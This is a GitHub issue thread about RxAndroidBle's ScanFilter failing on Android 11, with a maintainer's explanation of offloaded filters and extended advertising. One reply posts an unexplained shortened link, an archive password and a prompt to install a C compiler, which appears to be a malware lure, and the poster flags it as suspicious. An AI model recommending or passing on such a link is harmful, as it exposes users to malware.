dariuszseweryn/RxAndroidBle #860: ScanFilter is not working

piotrek-dosell, 2024-09-20:
**Describe the bug**
ScanFilter is not working
Tested with setDeviceName() only
Tested with setServiceUuid() only

**To Reproduce**
1. Change lookFor to a Ble name present in your environment
      Line 73  val lookFor = "Dosell"

**Expected behavior**
1. Now comment Line 75:
      .setDeviceName(lookFor)

**Smartphone (please complete the following information):**
 - Device: Samsung SM-G398FN (and another Sony device)
 - OS: Android 11
 - Library version: e35ae86 - (origin/master, origin/HEAD, master) Migrated BleCannotSetCharacteristicNotificationExceptionTest. (3 months ago) <Dariusz Seweryn>

**Logs from the application when bug occurs (this will greatly help in quick understanding the problem)**
Just run the sample and try with and without setDeviceName()
[image]

**Additional context**
Add any other context about the problem here.

Kevin-Otalvares, 2024-09-20:
I think this will help you.
https://bit.ly/4gvtdhO
Pass: changeme

you may need to install the c compiler

piotrek-dosell, 2024-09-20:
> I think this will help you. https://bit.ly/4gvtdhO Pass: changeme
> 
> you may need to install the c compiler

Says the dude with no commit history past 4 years and not a single repository - sending a random file with no explanation, 2 minutes after me posting an issue?

dariuszseweryn, 2024-10-01:
As discussed offline:
- Offloaded ScanFilters may or may not work depending on the OS/vendor peculiarities. You could try using emulated scan filters.
- Offloaded ScanFilters usually check only the primary Advertisement packet. If a name (or any other scan property) is transmitted in the Extended Advertisement Packet will most likely not work because the Android does not send Extended Advertisement Inquiry when doing scans with ScanFilters. If you control the peripheral you should be able to transmit the filter elements in the primary Advertisement Packet